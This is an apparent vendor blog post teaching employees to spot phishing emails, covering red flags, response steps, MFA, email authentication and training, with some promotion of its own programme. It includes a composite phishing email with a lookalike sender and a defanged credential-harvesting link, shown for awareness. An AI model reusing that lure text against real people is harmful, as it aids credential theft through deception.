The Email That Cost One Company $37 Million

In 2024, the FBI's Internet Crime Complaint Center reported that business email compromise — a sophisticated cousin of phishing — accounted for over $2.9 billion in adjusted losses in 2023 alone. That's not a typo. And those are just the cases that got reported. I've personally investigated incidents where a single convincing phishing email led to full network compromise within 48 hours. If you want to know how to spot phishing emails before they gut your organization, this guide breaks down the exact red flags, techniques, and habits that actually work.

Phishing remains the number one initial attack vector, according to the 2024 Verizon Data Breach Investigations Report. Threat actors don't need to hack your firewall when they can trick your receptionist into clicking a link. Here's what I've learned from years of dissecting these attacks.

What Is a Phishing Email, Really?

A phishing email is a message crafted by a threat actor to trick you into taking an action — clicking a link, opening an attachment, entering credentials, or wiring money. That's it. The sophistication ranges from laughably bad to terrifyingly convincing.

What makes phishing so dangerous isn't the technology. It's the social engineering. Attackers exploit urgency, authority, fear, and curiosity. They study your organization, mimic your vendors, and time their messages to land when you're distracted.

Understanding this psychology is the first step to building real defense. Technology catches some phishing. Trained humans catch the rest.

How to Spot Phishing Emails: 9 Red Flags That Matter

I've reviewed thousands of phishing emails in forensic investigations. These are the red flags that show up again and again. Memorize them. Drill them into your team.

1. The Sender Address Doesn't Match the Brand

This is the single easiest check, and most people skip it. A message claiming to be from Microsoft arrives from [email protected]. The display name says "IT Support" but the actual email address is a random domain. Always expand the sender field and read the full address.

In my experience, roughly 70% of phishing emails I analyze use lookalike domains — swapped characters, added hyphens, or completely unrelated domains hidden behind a familiar display name.

2. Urgency That Demands Immediate Action

"Your account will be suspended in 24 hours." "Unauthorized login detected — verify now." "Payment overdue — immediate action required." Threat actors weaponize urgency because panicked people don't think critically. Legitimate organizations rarely threaten instant consequences via email.

3. Generic Greetings on Supposedly Personal Messages

Your bank knows your name. Your employer knows your name. If an email about "your account" starts with "Dear Customer" or "Dear User," that's a flag. Spear phishing attacks targeting specific individuals will use your real name, so this alone isn't conclusive — but combined with other signals, it matters.

Hover over every link before clicking. On desktop, your browser or email client will show the actual URL in the bottom-left corner or a tooltip. If the text says "Login to your account" but the URL points to hxxps://login.account-verify-secure.xyz, that's a phishing page designed for credential theft.

On mobile devices, long-press the link to preview the URL. Never tap links in unexpected emails on your phone — the small screen makes it harder to spot fakes.

5. Unexpected Attachments

Attachments remain a primary delivery mechanism for malware and ransomware. If you weren't expecting a file — especially a .zip, .exe, .docm, or .html attachment — don't open it. Even PDFs can contain malicious links. I've seen attackers disguise executable files as invoices, shipping confirmations, and HR documents.

6. Requests for Credentials or Sensitive Data

No legitimate company emails you asking for your password, Social Security number, or full credit card number. None. Ever. If an email asks you to "verify your credentials" by entering them on a linked page, it's phishing. This is the core mechanic of credential theft, and it works because people trust the context the attacker creates.

7. Spelling and Grammar Errors — But Not Always

The old advice about typos still holds for bulk phishing campaigns. Misspelled words, awkward phrasing, and broken grammar indicate a low-effort mass attack. But here's the catch: AI-generated phishing emails in 2024 are nearly flawless. Attackers use large language models to write perfect English. Don't rely on grammar alone.

8. Mismatched Branding and Formatting

Blurry logos, wrong colors, inconsistent fonts, and formatting that doesn't match the company's usual emails are strong signals. Compare suspicious emails side-by-side with legitimate ones you've received from the same organization. Your eye will catch differences your conscious mind might miss.

9. Too-Good-to-Be-True Offers

"You've won a $500 gift card." "Claim your tax refund." "Your package is waiting — just confirm your address." If you didn't enter a contest, file for a refund, or order a package, these are social engineering bait. They exploit curiosity and greed in equal measure.

What Does a Real Phishing Email Look Like?

Let me walk you through a composite based on real attacks I've analyzed — details changed to protect the organizations involved.

Subject: Action Required: Unusual Sign-In Activity
From: [email protected]
Body: "We detected an unusual sign-in attempt on your account. If this wasn't you, please verify your identity immediately by clicking the button below. Failure to respond within 12 hours will result in account suspension."
Button text: Verify My Identity
Actual link: hxxps://login-verify.accountsecure.ru/auth

Red flags present: lookalike domain (micros0ft, not microsoft), urgency (12 hours), fear (account suspension), link goes to a Russian domain. This email would bypass many spam filters because it uses proper formatting, correct Microsoft branding, and grammatically perfect English.

The $4.88M Lesson Your Organization Can't Afford

IBM's 2024 Cost of a Data Breach Report puts the global average cost of a data breach at $4.88 million. Phishing was the most common initial attack vector, and breaches starting with phishing took an average of 261 days to identify and contain.

Think about that. A single employee clicking a single link can trigger a breach that takes nearly nine months to fully resolve. The costs cascade: incident response, legal fees, regulatory fines, customer notification, brand damage, and lost business.

This is why knowing how to spot phishing emails isn't just an IT problem — it's a business survival skill. Every employee with an email address is a potential entry point for threat actors.

Why Phishing Simulations Change Behavior

Telling people about phishing doesn't work. Testing them does. In my experience running security awareness programs, organizations that conduct regular phishing simulations see click rates drop from 25-35% to under 5% within six months.

A good simulation program sends realistic phishing emails to employees, tracks who clicks, and delivers immediate training at the moment of failure. That instant feedback loop rewires behavior in a way that annual PowerPoint presentations never will.

If your organization isn't running phishing simulations yet, our phishing awareness training for organizations is designed to build exactly this capability — realistic scenarios, measurable results, and training that sticks.

What to Do When You Spot a Phishing Email

Knowing how to spot phishing emails is only half the equation. Here's what to do next:

  • Don't click anything. No links, no attachments, no "unsubscribe" buttons.
  • Report it. Use your organization's phishing report button (most email clients have one) or forward it to your IT/security team.
  • Delete it. After reporting, remove it from your inbox and trash.
  • If you clicked, say so immediately. Speed matters. Your security team can reset credentials, isolate machines, and block malicious domains — but only if they know.
  • Change your password. If you entered credentials on a suspicious page, change that password everywhere you used it. Enable multi-factor authentication if you haven't already.

The worst thing an employee can do after clicking a phishing link is hide it. I've seen breaches escalate from minor incidents to full-blown ransomware attacks because the initial compromise went unreported for days.

Multi-Factor Authentication: Your Safety Net

Even the best-trained employee will eventually make a mistake. That's why multi-factor authentication (MFA) is non-negotiable. MFA ensures that stolen credentials alone aren't enough for a threat actor to access your systems.

According to CISA's MFA guidance, enabling MFA blocks over 99% of automated credential attacks. It's the single most effective technical control against phishing-driven credential theft.

Use app-based authenticators or hardware security keys. SMS-based MFA is better than nothing but vulnerable to SIM-swapping attacks. Push notifications with number matching add another layer of verification.

Building a Zero Trust Mindset Around Email

The zero trust security model applies perfectly to email. The principle is simple: never trust, always verify. Every email is suspicious until proven otherwise — regardless of who it appears to come from.

Here's what a zero trust approach to email looks like in practice:

  • Verify out-of-band. If your CEO emails asking for a wire transfer, call them on a known phone number. Don't reply to the email.
  • Assume compromise. Treat every unexpected attachment and link as potentially malicious, even from known contacts. Their account may be compromised.
  • Limit trust in display names. Display names are trivially spoofed. Always check the actual sender address.
  • Layer defenses. Email filtering, endpoint detection, MFA, and trained employees all work together. No single layer is sufficient.

Zero trust isn't a product you buy. It's a mindset your entire organization adopts. And it starts with security awareness training that teaches people to question everything they receive.

Training That Goes Beyond a Poster on the Wall

I've seen too many organizations check the "security training" box with a once-a-year video and a quiz. That's compliance theater. It doesn't reduce risk.

Effective security awareness training is continuous, scenario-based, and tied to your organization's actual threat landscape. It includes phishing simulations, teaches employees to recognize social engineering tactics, and builds a culture where reporting suspicious emails is rewarded — not punished.

Our cybersecurity awareness training program covers phishing, social engineering, ransomware prevention, credential hygiene, and more. It's built for organizations that want measurable improvement, not just a checkbox.

The Technical Controls That Support Trained Eyes

Human training works best when backed by solid technical controls. Here's what your IT team should have in place:

Email Authentication Protocols

SPF, DKIM, and DMARC are email authentication standards that help prevent domain spoofing. If your organization hasn't implemented DMARC with a policy of "reject," attackers can send emails that appear to come from your exact domain. The NIST Trustworthy Email guidelines (SP 800-177) provide detailed implementation steps.

Advanced Threat Protection

Modern email security gateways use sandboxing to detonate attachments, URL rewriting to check links at click time, and machine learning to detect anomalous sending patterns. These tools catch many phishing emails before they hit inboxes. But they don't catch all of them — which is why trained humans remain the last line of defense.

Endpoint Detection and Response (EDR)

If someone does click a malicious link, EDR solutions on their device can detect suspicious behavior — like a browser spawning PowerShell, or a document trying to download an executable. EDR buys your team time to contain an incident before it spreads.

What Makes 2024 Phishing Different

Phishing in 2024 is more dangerous than ever. Three trends are driving the escalation:

AI-generated content. Attackers use generative AI to create phishing emails with perfect grammar, personalized details, and convincing pretexts. The days of obvious broken English are fading fast.

QR code phishing (quishing). Threat actors embed malicious URLs in QR codes attached to emails, bypassing traditional URL scanning. The victim scans the code with their phone — which likely lacks corporate security controls — and lands on a credential harvesting page.

Multi-channel attacks. Phishing no longer lives only in email. Attackers combine email lures with follow-up phone calls (vishing), text messages (smishing), and even Microsoft Teams or Slack messages. If your training only covers email, you're leaving gaps.

A Quick-Reference Checklist

Print this. Tape it next to your monitor. Share it with your team.

  • Check the full sender email address — not just the display name
  • Hover over links before clicking — verify the actual URL
  • Question urgency — legitimate organizations don't threaten you via email
  • Don't open unexpected attachments — especially .zip, .exe, .html, .docm files
  • Never enter credentials from an email link — go directly to the website instead
  • Report suspicious emails immediately — speed saves your organization
  • Enable multi-factor authentication on every account that supports it
  • Verify unusual requests through a separate channel — call, don't reply

Knowing how to spot phishing emails is a skill, and like any skill, it improves with practice. Run simulations. Talk about phishing openly. Reward people who report suspicious messages. Build a culture where vigilance is valued.

Your inbox is the front line. Act like it.